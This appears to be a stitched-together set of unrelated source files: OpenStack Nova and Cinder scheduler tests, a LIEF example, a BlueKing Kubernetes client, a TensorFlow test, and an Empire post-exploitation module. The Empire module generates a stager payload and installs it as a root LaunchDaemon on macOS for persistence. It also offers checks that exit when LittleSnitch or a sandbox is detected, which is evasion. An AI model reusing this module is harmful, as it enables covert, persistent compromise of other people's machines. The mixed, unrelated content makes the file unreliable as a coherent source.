# We've requested the specified number of limited (by pagesize)
# pages, so request a penultimate page with no limit which
# should always finish out the result.
limit = None
else:
# Request a limited-size page for the first $pages pages.
limit = pagesize
if insts:
# If we're not on the first page, use the last instance we
# received as the marker
marker = insts[-1]['uuid']
else:
# No marker for the first page
marker = None
batch = list(
instance_list.get_instances_sorted(self.context, {},
limit, marker,
[], [sort_by],
[sort_dir])[1])
if not batch:
# This should only happen when we've pulled the last empty
# page because we used the marker of the last instance. If
# we end up with a non-deterministic ordering, we'd loop
# forever.
break
insts.extend(batch)
page += 1
if page > len(self.instances) * 2:
# Do this sanity check in case we introduce (or find) another
# repeating page bug like #1721791. Without this we loop
# until timeout, which is less obvious.
raise Exception('Infinite paging loop')
# We should have requested exactly $pages pages, or one more for the final unlimited request
self.assertIn(page, (pages, pages + 1))
# Make sure the full set matches what we know to be true
found = [x[sort_by] for x in insts]
had = [x[sort_by] for x in self.instances]
if sort_by in ('launched_at', 'created_at'):
# We're comparing objects and database entries, so we need to
# squash the tzinfo of the object ones so we can compare
had = [x.replace(tzinfo=None) for x in had]
self.assertEqual(len(had), len(found))
if sort_dir == 'asc':
self.assertEqual(sorted(had), found)
else:
self.assertEqual(list(reversed(sorted(had))), found)
def test_get_sorted_with_limit_marker_stable(self):
"""Test sorted by hostname.
This will be a stable sort that won't change on each run.
"""
self._test_get_sorted_with_limit_marker(sort_by='hostname')
def test_get_sorted_with_limit_marker_stable_reverse(self):
"""Test sorted by hostname.
This will be a stable sort that won't change on each run.
"""
self._test_get_sorted_with_limit_marker(sort_by='hostname',
sort_dir='desc')
def test_get_sorted_with_limit_marker_stable_different_pages(self):
"""Test sorted by hostname with different page sizes.
Just do the above with page seams in different places.
"""
self._test_get_sorted_with_limit_marker(sort_by='hostname',
pages=3, pagesize=1)
def test_get_sorted_with_limit_marker_stable_different_pages_reverse(self):
"""Test sorted by hostname with different page sizes.
Just do the above with page seams in different places.
"""
self._test_get_sorted_with_limit_marker(sort_by='hostname',
pages=3, pagesize=1,
sort_dir='desc')
def test_get_sorted_with_limit_marker_random(self):
"""Test sorted by uuid.
This will not be stable and the actual ordering will depend on
uuid generation and thus be different on each run. Do this in
addition to the stable sort above to keep us honest.
"""
self._test_get_sorted_with_limit_marker(sort_by='uuid')
def test_get_sorted_with_limit_marker_random_different_pages(self):
"""Test sorted by uuid with different page sizes.
Just do the above with page seams in different places.
"""
self._test_get_sorted_with_limit_marker(sort_by='uuid',
pages=3, pagesize=2)
def test_get_sorted_with_limit_marker_datetime(self):
"""Test sorted by launched_at.
This tests that we can do all of this, but with datetime
fields.
"""
self._test_get_sorted_with_limit_marker(sort_by='launched_at')
def test_get_sorted_with_limit_marker_datetime_same(self):
"""Test sorted by created_at.
This tests that we can do all of this, but with datetime
fields that are identical.
"""
self._test_get_sorted_with_limit_marker(sort_by='created_at')
def test_get_sorted_with_deleted_marker(self):
marker = self.instances[1]['uuid']
before = list(
instance_list.get_instances_sorted(self.context, {},
None, marker,
[], None, None)[1])
db.instance_destroy(self.context, marker)
after = list(
instance_list.get_instances_sorted(self.context, {},
None, marker,
[], None, None)[1])
self.assertEqual(before, after)
def test_get_sorted_with_invalid_marker(self):
self.assertRaises(exception.MarkerNotFound,
list, instance_list.get_instances_sorted(
self.context, {}, None, 'not-a-marker',
[], None, None)[1])
def test_get_sorted_with_purged_instance(self):
"""Test that we handle a mapped but purged instance."""
im = objects.InstanceMapping(self.context,
instance_uuid=uuids.missing,
project_id=self.context.project_id,
user_id=self.context.user_id,
cell=self.cells[0])
im.create()
self.assertRaises(exception.MarkerNotFound,
list, instance_list.get_instances_sorted(
self.context, {}, None, uuids.missing,
[], None, None)[1])
def _test_get_paginated_with_filter(self, filters):
found_uuids = []
marker = None
while True:
# Query for those instances, sorted by a different key in
# pages of one until we've consumed them all
batch = list(
instance_list.get_instances_sorted(self.context,
filters,
1, marker, [],
['hostname'],
['asc'])[1])
if not batch:
break
found_uuids.extend([x['uuid'] for x in batch])
marker = found_uuids[-1]
return found_uuids
def test_get_paginated_with_uuid_filter(self):
"""Test getting pages with uuid filters.
This runs through the results of a uuid-filtered query in pages of
length one to ensure that we land on markers that are filtered out
of the query and are not accidentally returned.
"""
# Pick a set of the instances by uuid, when sorted by uuid
all_uuids = [x['uuid'] for x in self.instances]
filters = {'uuid': sorted(all_uuids)[:7]}
found_uuids = self._test_get_paginated_with_filter(filters)
# Make sure we found all (and only) the instances we asked for
self.assertEqual(set(found_uuids), set(filters['uuid']))
self.assertEqual(7, len(found_uuids))
def test_get_paginated_with_other_filter(self):
"""Test getting pages with another filter.
This runs through the results of a filtered query in pages of
length one to ensure we land on markers that are filtered out
of the query and are not accidentally returned.
"""
expected = [inst['uuid'] for inst in self.instances
if inst['instance_type_id'] == 1]
filters = {'instance_type_id': 1}
found_uuids = self._test_get_paginated_with_filter(filters)
self.assertEqual(set(expected), set(found_uuids))
def test_get_paginated_with_uuid_and_other_filter(self):
"""Test getting pages with a uuid and other type of filter.
We do this to make sure that we still find (but exclude) the
marker even if one of the other filters would have included
it.
"""
# Pick a set of the instances by uuid, when sorted by uuid
all_uuids = [x['uuid'] for x in self.instances]
filters = {'uuid': sorted(all_uuids)[:7],
'user_id': 'fake'}
found_uuids = self._test_get_paginated_with_filter(filters)
# Make sure we found all (and only) the instances we asked for
self.assertEqual(set(found_uuids), set(filters['uuid']))
self.assertEqual(7, len(found_uuids))
def test_get_sorted_with_faults(self):
"""Make sure we get faults when we ask for them."""
insts = list(
instance_list.get_instances_sorted(self.context, {},
None, None,
['fault'],
['hostname'], ['asc'])[1])
# Two of the instances in each cell have faults (0th and 2nd)
expected_faults = self.NUMBER_OF_CELLS * 2
expected_no_fault = len(self.instances) - expected_faults
faults = [inst['fault'] for inst in insts]
self.assertEqual(expected_no_fault, faults.count(None))
def test_get_sorted_paginated_with_faults(self):
"""Get pages of one with faults.
Do this specifically so we make sure we land on faulted marker
instances to ensure we don't omit theirs.
"""
insts = []
while True:
if insts:
marker = insts[-1]['uuid']
else:
marker = None
batch = list(
instance_list.get_instances_sorted(self.context, {},
1, marker,
['fault'],
['hostname'], ['asc'])[1])
if not batch:
break
insts.extend(batch)
self.assertEqual(len(self.instances), len(insts))
# Two of the instances in each cell have faults (0th and 2nd)
expected_faults = self.NUMBER_OF_CELLS * 2
expected_no_fault = len(self.instances) - expected_faults
faults = [inst['fault'] for inst in insts]
self.assertEqual(expected_no_fault, faults.count(None))
def test_instance_list_minimal_cells(self):
"""Get a list of instances with a subset of cell mappings."""
last_cell = self.cells[-1]
with context.target_cell(self.context, last_cell) as cctxt:
last_cell_instances = db.instance_get_all(cctxt)
last_cell_uuids = [inst['uuid'] for inst in last_cell_instances]
instances = list(
instance_list.get_instances_sorted(self.context, {},
None, None, [],
['uuid'], ['asc'],
cell_mappings=self.cells[:-1])
[1])
found_uuids = [inst['hostname'] for inst in instances]
had_uuids = [inst['hostname'] for inst in self.instances
if inst['uuid'] not in last_cell_uuids]
self.assertEqual(sorted(had_uuids), sorted(found_uuids))
class TestInstanceListObjects(test.TestCase):
def setUp(self):
super(TestInstanceListObjects, self).setUp()
self.context = context.RequestContext('fake', 'fake')
self.num_instances = 3
self.instances = []
start = datetime.datetime(1985, 10, 25, 1, 21, 0)
dt = start
spread = datetime.timedelta(minutes=10)
cells = objects.CellMappingList.get_all(self.context)
# Create three instances in each of the real cells. Leave the
# first cell empty to make sure we don't break with an empty
# one
for cell in cells[1:]:
for i in range(0, self.num_instances):
with context.target_cell(self.context, cell) as cctx:
inst = objects.Instance(
context=cctx,
project_id=self.context.project_id,
user_id=self.context.user_id,
created_at=start,
launched_at=dt,
instance_type_id=i,
hostname='%s-inst%i' % (cell.name, i))
inst.create()
if i % 2 == 0:
# Make some faults for this instance
for n in range(0, i + 1):
msg = 'fault%i-%s' % (n, inst.hostname)
f = objects.InstanceFault(context=cctx,
instance_uuid=inst.uuid,
code=i,
message=msg,
details='fake',
host='fakehost')
f.create()
self.instances.append(inst)
im = objects.InstanceMapping(context=self.context,
project_id=inst.project_id,
user_id=inst.user_id,
instance_uuid=inst.uuid,
cell_mapping=cell)
im.create()
dt += spread
def test_get_instance_objects_sorted(self):
filters = {}
limit = None
marker = None
expected_attrs = []
sort_keys = ['uuid']
sort_dirs = ['asc']
insts, down_cell_uuids = instance_list.get_instance_objects_sorted(
self.context, filters, limit, marker, expected_attrs,
sort_keys, sort_dirs)
found_uuids = [x.uuid for x in insts]
had_uuids = sorted([x['uuid'] for x in self.instances])
self.assertEqual(had_uuids, found_uuids)
# Make sure none of the instances have fault set
self.assertEqual(0, len([inst for inst in insts
if 'fault' in inst]))
def test_get_instance_objects_sorted_with_fault(self):
filters = {}
limit = None
marker = None
expected_attrs = ['fault']
sort_keys = ['uuid']
sort_dirs = ['asc']
insts, down_cell_uuids = instance_list.get_instance_objects_sorted(
self.context, filters, limit, marker, expected_attrs,
sort_keys, sort_dirs)
found_uuids = [x.uuid for x in insts]
had_uuids = sorted([x['uuid'] for x in self.instances])
self.assertEqual(had_uuids, found_uuids)
# They should all have fault set, but only some have
# actual faults
self.assertEqual(2, len([inst for inst in insts
if inst.fault]))
def test_get_instance_objects_sorted_paged(self):
"""Query a full first page and ensure an empty second one.
This uses created_at which is enforced to be the same across
each instance by setUp(). This will help make sure we still
have a stable ordering, even when we only claim to care about
created_at.
"""
instp1, down_cell_uuids = instance_list.get_instance_objects_sorted(
self.context, {}, None, None, [],
['created_at'], ['asc'])
self.assertEqual(len(self.instances), len(instp1))
instp2, down_cell_uuids = instance_list.get_instance_objects_sorted(
self.context, {}, None, instp1[-1]['uuid'], [],
['created_at'], ['asc'])
self.assertEqual(0, len(instp2))
|
examples/python/abstract_json.py
|
rafael-santiago/LIEF
| 2,999 |
64596
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Description
# -----------
# Dump abstract information in JSON format
# see: abstract_reader.py
import argparse
import sys
import lief
import json
def main():
parser = argparse.ArgumentParser()
parser.add_argument('binary', help = 'A binary')
args = parser.parse_args()
binary = lief.parse(args.binary)
json_data = json.loads(lief.to_json_from_abstract(binary))
print(json.dumps(json_data, sort_keys = True, indent = 4))
if __name__ == "__main__":
sys.exit(main())
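# --- Added usage sketch (illustration only; the sample path is a placeholder for any
# ELF/PE/Mach-O binary available locally):
#   python abstract_json.py /bin/ls
# parses the binary with LIEF and pretty-prints its format-agnostic ("abstract") metadata
# as sorted, indented JSON.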
|
bcs-ui/backend/resources/workloads/cronjob/client.py
|
laodiu/bk-bcs
| 599 |
64619
|
<reponame>laodiu/bk-bcs
# -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making 蓝鲸智云PaaS平台社区版 (BlueKing PaaS Community
Edition) available.
Copyright (C) 2017-2021 TH<NAME>, a Tencent company. All rights reserved.
Licensed under the MIT License (the "License"); you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://opensource.org/licenses/MIT
Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on
an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
specific language governing permissions and limitations under the License.
"""
from backend.container_service.clusters.base.models import CtxCluster
from backend.resources.constants import DEFAULT_CRON_JOB_API_VERSION, K8sResourceKind
from backend.resources.resource import ResourceClient
from backend.resources.workloads.cronjob.formatter import CronJobFormatter
class CronJob(ResourceClient):
kind = K8sResourceKind.CronJob.value
formatter = CronJobFormatter()
def __init__(self, ctx_cluster: CtxCluster):
super().__init__(ctx_cluster=ctx_cluster, api_version=DEFAULT_CRON_JOB_API_VERSION)
|
trax/tf_numpy/public_symbol_test.py
|
dedsec-9/trax
| 7,220 |
64630
|
<gh_stars>1000+
# coding=utf-8
# Copyright 2021 The Trax Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests different ways to use the public tf-numpy module."""
import numpy as onp
import tensorflow as tf
import tensorflow.experimental.numpy as np1
from tensorflow.experimental import numpy as np2 # pylint: disable=reimported
np3 = tf.experimental.numpy
class PublicSymbolTest(tf.test.TestCase):
def testSimple(self):
a = 0.1
b = 0.2
for op in [np1.add, np2.add, np3.add]:
self.assertAllClose(onp.add(a, b), op(a, b))
if __name__ == "__main__":
tf.compat.v1.enable_eager_execution()
tf.test.main()
|
lib/modules/python/persistence/osx/launchdaemonexecutable.py
|
Strazzom/Empire
| 230 |
64638
|
<gh_stars>100-1000
import base64
class Module:
def __init__(self, mainMenu, params=[]):
# metadata info about the module, not modified during runtime
self.info = {
# name for the module that will appear in module menus
'Name': 'LaunchDaemon',
# list of one or more authors for the module
'Author': ['@xorrior'],
# more verbose multi-line description of the module
'Description': ('Installs an Empire launchDaemon.'),
# True if the module needs to run in the background
'Background' : False,
# File extension to save the file as
'OutputExtension' : None,
# if the module needs administrative privileges
'NeedsAdmin' : True,
# True if the method doesn't touch disk/is reasonably opsec safe
'OpsecSafe' : False,
# the module language
'Language' : 'python',
# the minimum language version needed
'MinLanguageVersion' : '2.6',
# list of any references/other comments
'Comments': []
}
# any options needed by the module, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Agent' : {
# The 'Agent' option is the only one that MUST be in a module
'Description' : 'Agent to execute module on.',
'Required' : True,
'Value' : ''
},
'Listener' : {
'Description' : 'Listener to use.',
'Required' : True,
'Value' : ''
},
'SafeChecks' : {
'Description' : 'Switch. Checks for LittleSnitch or a SandBox; exits the staging process if either is found. Defaults to True.',
'Required' : True,
'Value' : 'True'
},
'UserAgent' : {
'Description' : 'User-agent string to use for the staging request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'DaemonName' : {
'Description' : 'Name of the Launch Daemon to install. Name will also be used for the plist file.',
'Required' : True,
'Value' : 'com.proxy.initialize'
},
'DaemonLocation' : {
'Description' : 'The full path of where the Empire launch daemon should be located.',
'Required' : True,
'Value' : ''
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
# During instantiation, any settable option parameters
# are passed as an object set to the module and the
# options dictionary is automatically set. This is mostly
# in case options are passed on the command line
if params:
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self, obfuscate=False, obfuscationCommand=""):
daemonName = self.options['DaemonName']['Value']
programname = self.options['DaemonLocation']['Value']
plistfilename = "%s.plist" % daemonName
listenerName = self.options['Listener']['Value']
userAgent = self.options['UserAgent']['Value']
safeChecks = self.options['SafeChecks']['Value']
launcher = self.mainMenu.stagers.generate_launcher(listenerName, language='python', userAgent=userAgent, safeChecks=safeChecks)
launcher = launcher.strip('echo').strip(' | python &').strip("\"")
machoBytes = self.mainMenu.stagers.generate_macho(launcherCode=launcher)
encBytes = base64.b64encode(machoBytes)
plistSettings = """
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0">
<plist version="1.0">
<dict>
<key>Label</key>
<string>%s</string>
<key>ProgramArguments</key>
<array>
<string>%s</string>
</array>
<key>RunAtLoad</key>
<true/>
<key>KeepAlive</key>
<true/>
</dict>
</plist>
""" % (daemonName, programname)
script = """
import subprocess
import sys
import base64
import os
encBytes = "%s"
bytes = base64.b64decode(encBytes)
plist = \"\"\"
%s
\"\"\"
daemonPath = "%s"
if not os.path.exists(os.path.split(daemonPath)[0]):
os.makedirs(os.path.split(daemonPath)[0])
e = open(daemonPath,'wb')
e.write(bytes)
e.close()
os.chmod(daemonPath, 0777)
f = open('/tmp/%s','w')
f.write(plist)
f.close()
process = subprocess.Popen('chmod 644 /tmp/%s', stdout=subprocess.PIPE, shell=True)
process.communicate()
process = subprocess.Popen('chown -R root /tmp/%s', stdout=subprocess.PIPE, shell=True)
process.communicate()
process = subprocess.Popen('chown :wheel /tmp/%s', stdout=subprocess.PIPE, shell=True)
process.communicate()
process = subprocess.Popen('mv /tmp/%s /Library/LaunchDaemons/%s', stdout=subprocess.PIPE, shell=True)
process.communicate()
process = subprocess.Popen('launchctl load /Library/LaunchDaemons/%s', stdout=subprocess.PIPE, shell=True)
process.communicate()
print "\\n[+] Persistence has been installed: /Library/LaunchDaemons/%s"
print "\\n[+] Empire daemon has been written to %s"
""" % (encBytes,plistSettings, programname, plistfilename, plistfilename, plistfilename, plistfilename, plistfilename, plistfilename, plistfilename, plistfilename, programname)
return script
|
cinder/tests/unit/scheduler/test_capacity_weigher.py
|
helenwalsh/cinder
| 571 |
64668
|
# Copyright 2011-2012 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Tests For Capacity Weigher."""
from datetime import datetime
from unittest import mock
import ddt
from cinder.common import constants
from cinder import context
from cinder.scheduler import weights
from cinder.tests.unit.scheduler import fakes
from cinder.tests.unit import test
from cinder.volume import volume_utils
@ddt.ddt
class CapacityWeigherTestCase(test.TestCase):
def setUp(self):
super(CapacityWeigherTestCase, self).setUp()
self.host_manager = fakes.FakeHostManager()
self.weight_handler = weights.OrderedHostWeightHandler(
'cinder.scheduler.weights')
def _get_weighed_hosts(self, hosts, weight_properties=None):
if weight_properties is None:
weight_properties = {'size': 1}
return self.weight_handler.get_weighed_objects(
[weights.capacity.CapacityWeigher],
hosts,
weight_properties)
@mock.patch('cinder.db.sqlalchemy.api.service_get_all')
def _get_all_backends(self, _mock_service_get_all, disabled=False):
ctxt = context.get_admin_context()
fakes.mock_host_manager_db_calls(_mock_service_get_all,
disabled=disabled)
backend_states = self.host_manager.get_all_backend_states(ctxt)
_mock_service_get_all.assert_called_once_with(
ctxt,
None, # backend_match_level
topic=constants.VOLUME_TOPIC, frozen=False, disabled=disabled)
return backend_states
# If thin and thin_provisioning_support are True,
# use the following formula:
# free = (total * host_state.max_over_subscription_ratio
# - host_state.provisioned_capacity_gb
# - math.floor(total * reserved))
# Otherwise, use the following formula:
# free = free_space - math.floor(total * reserved)
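# Worked example (illustrative, using the host2 values assumed in the
# per-test comments below): total=2048, max_over_subscription_ratio=1.5,
# provisioned_capacity_gb=1748, reserved=0.1, so
# free = 2048 * 1.5 - 1748 - math.floor(2048 * 0.1)
#      = 3072 - 1748 - 204 = 1120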
@ddt.data(
{'volume_type': {'extra_specs': {'provisioning:type': 'thin'}},
'winner': 'host2'},
{'volume_type': {'extra_specs': {'provisioning:type': 'thick'}},
'winner': 'host1'},
{'volume_type': {'extra_specs': {}},
'winner': 'host2'},
{'volume_type': {},
'winner': 'host2'},
{'volume_type': None,
'winner': 'host2'},
)
@ddt.unpack
def test_default_of_spreading_first(self, volume_type, winner):
backend_info_list = self._get_all_backends()
# Results for the 1st test
# {'provisioning:type': 'thin'}:
# host1: thin_provisioning_support = False
# free_capacity_gb=1024,
# free=1024-math.floor(1024*0.1)=922
# Norm=0.837837837838
# host2: thin_provisioning_support = True
# free_capacity_gb=300,
# free=2048*1.5-1748-math.floor(2048*0.1)=1120
# Norm=1.0
# host3: thin_provisioning_support = False
# free_capacity_gb=512, free=256-512*0=256
# Norm=0.292383292383
# host4: thin_provisioning_support = True
# free_capacity_gb=200,
# free=2048*1.0-2047-math.floor(2048*0.05)=-101
# Norm=0.0
# host5: free_capacity_gb=unknown free=-1
# Norm=0.0819000819001
# so, host2 should win:
weight_properties = {
'size': 1,
'volume_type': volume_type,
}
weighed_host = self._get_weighed_hosts(
backend_info_list,
weight_properties=weight_properties)[0]
self.assertEqual(1.0, weighed_host.weight)
self.assertEqual(winner,
volume_utils.extract_host(weighed_host.obj.host))
@ddt.data(
{'volume_type': {'extra_specs': {'provisioning:type': 'thin'}},
'winner': 'host4'},
{'volume_type': {'extra_specs': {'provisioning:type': 'thick'}},
'winner': 'host2'},
{'volume_type': {'extra_specs': {}},
'winner': 'host4'},
{'volume_type': {},
'winner': 'host4'},
{'volume_type': None,
'winner': 'host4'},
)
@ddt.unpack
def test_capacity_weight_multiplier1(self, volume_type, winner):
self.flags(capacity_weight_multiplier=-1.0)
backend_info_list = self._get_all_backends()
# Results for the 1st test
# {'provisioning:type': 'thin'}:
# host1: thin_provisioning_support = False
# free_capacity_gb=1024,
# free=-(1024-math.floor(1024*0.1))=-922
# Norm=-0.00829542413701
# host2: thin_provisioning_support = True
# free_capacity_gb=300,
# free=-(2048*1.5-1748-math.floor(2048*0.1))=-1120
# Norm=-0.00990099009901
# host3: thin_provisioning_support = False
# free_capacity_gb=512, free=-(256-512*0)=-256
# Norm=-0.002894884083
# host4: thin_provisioning_support = True
# free_capacity_gb=200,
# free=-(2048*1.0-2047-math.floor(2048*0.05))=101
# Norm=0.0
# host5: free_capacity_gb=unknown free=-float('inf')
# Norm=-1.0
# so, host4 should win:
weight_properties = {
'size': 1,
'volume_type': volume_type,
}
weighed_host = self._get_weighed_hosts(
backend_info_list,
weight_properties=weight_properties)
weighed_host = weighed_host[0]
self.assertEqual(0.0, weighed_host.weight)
self.assertEqual(winner,
volume_utils.extract_host(weighed_host.obj.host))
@ddt.data(
{'volume_type': {'extra_specs': {'provisioning:type': 'thin'}},
'winner': 'host2'},
{'volume_type': {'extra_specs': {'provisioning:type': 'thick'}},
'winner': 'host1'},
{'volume_type': {'extra_specs': {}},
'winner': 'host2'},
{'volume_type': {},
'winner': 'host2'},
{'volume_type': None,
'winner': 'host2'},
)
@ddt.unpack
def test_capacity_weight_multiplier2(self, volume_type, winner):
self.flags(capacity_weight_multiplier=2.0)
backend_info_list = self._get_all_backends()
# Results for the 1st test
# {'provisioning:type': 'thin'}:
# host1: thin_provisioning_support = False
# free_capacity_gb=1024,
# free=(1024-math.floor(1024*0.1))*2=1844
# Norm=1.67567567568
# host2: thin_provisioning_support = True
# free_capacity_gb=300,
# free=(2048*1.5-1748-math.floor(2048*0.1))*2=2240
# Norm=2.0
# host3: thin_provisioning_support = False
# free_capacity_gb=512, free=(256-512*0)*2=512
# Norm=0.584766584767
# host4: thin_provisioning_support = True
# free_capacity_gb=200,
# free=(2048*1.0-2047-math.floor(2048*0.05))*2=-202
# Norm=0.0
# host5: free_capacity_gb=unknown free=-2
# Norm=0.1638001638
# so, host2 should win:
weight_properties = {
'size': 1,
'volume_type': volume_type,
}
weighed_host = self._get_weighed_hosts(
backend_info_list,
weight_properties=weight_properties)[0]
self.assertEqual(1.0 * 2, weighed_host.weight)
self.assertEqual(winner,
volume_utils.extract_host(weighed_host.obj.host))
def test_capacity_weight_no_unknown_or_infinite(self):
self.flags(capacity_weight_multiplier=-1.0)
del self.host_manager.service_states['host5']
backend_info_list = self._get_all_backends()
# host1: thin_provisioning_support = False
# free_capacity_gb=1024,
# free=(1024-math.floor(1024*0.1))=-922
# Norm=-0.837837837838
# host2: thin_provisioning_support = True
# free_capacity_gb=300,
# free=(2048*1.5-1748-math.floor(2048*0.1))=-1120
# Norm=-1.0
# host3: thin_provisioning_support = False
# free_capacity_gb=512, free=(256-512*0)=-256
# Norm=-0.292383292383
# host4: thin_provisioning_support = True
# free_capacity_gb=200,
# free=(2048*1.0-2047-math.floor(2048*0.05))=101
# Norm=0.0
# so, host4 should win:
weighed_hosts = self._get_weighed_hosts(backend_info_list)
best_host = weighed_hosts[0]
self.assertEqual(0.0, best_host.weight)
self.assertEqual('host4',
volume_utils.extract_host(best_host.obj.host))
# and host2 is the worst:
worst_host = weighed_hosts[-1]
self.assertEqual(-1.0, worst_host.weight)
self.assertEqual('host2',
volume_utils.extract_host(worst_host.obj.host))
def test_capacity_weight_free_unknown(self):
self.flags(capacity_weight_multiplier=-1.0)
self.host_manager.service_states['host5'] = {
'total_capacity_gb': 3000,
'free_capacity_gb': 'unknown',
'allocated_capacity_gb': 1548,
'provisioned_capacity_gb': 1548,
'max_over_subscription_ratio': 1.0,
'thin_provisioning_support': True,
'thick_provisioning_support': False,
'reserved_percentage': 5,
'timestamp': datetime.utcnow()}
backend_info_list = self._get_all_backends()
# host1: thin_provisioning_support = False
# free_capacity_gb=1024,
# free=(1024-math.floor(1024*0.1))=-922
# Norm= -0.00829542413701
# host2: thin_provisioning_support = True
# free_capacity_gb=300,
# free=(2048*1.5-1748-math.floor(2048*0.1))=-1120
# Norm=-0.00990099009901
# host3: thin_provisioning_support = False
# free_capacity_gb=512, free=(256-512*0)=-256
# Norm=-0.002894884083
# host4: thin_provisioning_support = True
# free_capacity_gb=200,
# free=(2048*1.0-2047-math.floor(2048*0.05))=101
# Norm=0.0
# host5: free_capacity_gb=unknown free=3000
# Norm=-1.0
# so, host4 should win:
weighed_hosts = self._get_weighed_hosts(backend_info_list)
best_host = weighed_hosts[0]
self.assertEqual(0.0, best_host.weight)
self.assertEqual('host4',
volume_utils.extract_host(best_host.obj.host))
# and host5 is the worst:
worst_host = weighed_hosts[-1]
self.assertEqual(-1.0, worst_host.weight)
self.assertEqual('host5',
volume_utils.extract_host(worst_host.obj.host))
def test_capacity_weight_cap_unknown(self):
self.flags(capacity_weight_multiplier=-1.0)
self.host_manager.service_states['host5'] = {
'total_capacity_gb': 'unknown',
'free_capacity_gb': 3000,
'allocated_capacity_gb': 1548,
'provisioned_capacity_gb': 1548,
'max_over_subscription_ratio': 1.0,
'thin_provisioning_support': True,
'thick_provisioning_support': False,
'reserved_percentage': 5,
'timestamp': datetime.utcnow()}
backend_info_list = self._get_all_backends()
# host1: thin_provisioning_support = False
# free_capacity_gb=1024,
# free=(1024-math.floor(1024*0.1))=-922
# Norm= -0.00829542413701
# host2: thin_provisioning_support = True
# free_capacity_gb=300,
# free=(2048*1.5-1748-math.floor(2048*0.1))=-1120
# Norm=-0.00990099009901
# host3: thin_provisioning_support = False
# free_capacity_gb=512, free=(256-512*0)=-256
# Norm=-0.002894884083
# host4: thin_provisioning_support = True
# free_capacity_gb=200,
# free=(2048*1.0-2047-math.floor(2048*0.05))=101
# Norm=0.0
# host5: free_capacity_gb=3000 free=unknown
# Norm=-1.0
# so, host4 should win:
weighed_hosts = self._get_weighed_hosts(backend_info_list)
best_host = weighed_hosts[0]
self.assertEqual(0.0, best_host.weight)
self.assertEqual('host4',
volume_utils.extract_host(best_host.obj.host))
# and host5 is the worst:
worst_host = weighed_hosts[-1]
self.assertEqual(-1.0, worst_host.weight)
self.assertEqual('host5',
volume_utils.extract_host(worst_host.obj.host))
def test_capacity_weight_free_infinite(self):
self.flags(capacity_weight_multiplier=-1.0)
self.host_manager.service_states['host5'] = {
'total_capacity_gb': 3000,
'free_capacity_gb': 'infinite',
'allocated_capacity_gb': 1548,
'provisioned_capacity_gb': 1548,
'max_over_subscription_ratio': 1.0,
'thin_provisioning_support': True,
'thick_provisioning_support': False,
'reserved_percentage': 5,
'timestamp': datetime.utcnow()}
backend_info_list = self._get_all_backends()
# host1: thin_provisioning_support = False
# free_capacity_gb=1024,
# free=(1024-math.floor(1024*0.1))=-922
# Norm= -0.00829542413701
# host2: thin_provisioning_support = True
# free_capacity_gb=300,
# free=(2048*1.5-1748-math.floor(2048*0.1))=-1120
# Norm=-0.00990099009901
# host3: thin_provisioning_support = False
# free_capacity_gb=512, free=(256-512*0)=-256
# Norm=-0.002894884083
# host4: thin_provisioning_support = True
# free_capacity_gb=200,
# free=(2048*1.0-2047-math.floor(2048*0.05))=101
# Norm=0.0
# host5: free_capacity_gb=infinite free=3000
# Norm=-1.0
# so, host4 should win:
weighed_hosts = self._get_weighed_hosts(backend_info_list)
best_host = weighed_hosts[0]
self.assertEqual(0.0, best_host.weight)
self.assertEqual('host4',
volume_utils.extract_host(best_host.obj.host))
# and host5 is the worst:
worst_host = weighed_hosts[-1]
self.assertEqual(-1.0, worst_host.weight)
self.assertEqual('host5',
volume_utils.extract_host(worst_host.obj.host))
def test_capacity_weight_cap_infinite(self):
self.flags(capacity_weight_multiplier=-1.0)
self.host_manager.service_states['host5'] = {
'total_capacity_gb': 'infinite',
'free_capacity_gb': 3000,
'allocated_capacity_gb': 1548,
'provisioned_capacity_gb': 1548,
'max_over_subscription_ratio': 1.0,
'thin_provisioning_support': True,
'thick_provisioning_support': False,
'reserved_percentage': 5,
'timestamp': datetime.utcnow()}
backend_info_list = self._get_all_backends()
# host1: thin_provisioning_support = False
# free_capacity_gb=1024,
# free=(1024-math.floor(1024*0.1))=-922
# Norm= -0.00829542413701
# host2: thin_provisioning_support = True
# free_capacity_gb=300,
# free=(2048*1.5-1748-math.floor(2048*0.1))=-1120
# Norm=-0.00990099009901
# host3: thin_provisioning_support = False
# free_capacity_gb=512, free=(256-512*0)=-256
# Norm=-0.002894884083
# host4: thin_provisioning_support = True
# free_capacity_gb=200,
# free=(2048*1.0-2047-math.floor(2048*0.05))=101
# Norm=0.0
# host5: free_capacity_gb=3000 free=infinite
# Norm=-1.0
# so, host4 should win:
weighed_hosts = self._get_weighed_hosts(backend_info_list)
best_host = weighed_hosts[0]
self.assertEqual(0.0, best_host.weight)
self.assertEqual('host4',
volume_utils.extract_host(best_host.obj.host))
# and host5 is the worst:
worst_host = weighed_hosts[-1]
self.assertEqual(-1.0, worst_host.weight)
self.assertEqual('host5',
volume_utils.extract_host(worst_host.obj.host))
|
components/isceobj/IsceProc/runGeocode.py
|
vincentschut/isce2
| 1,133 |
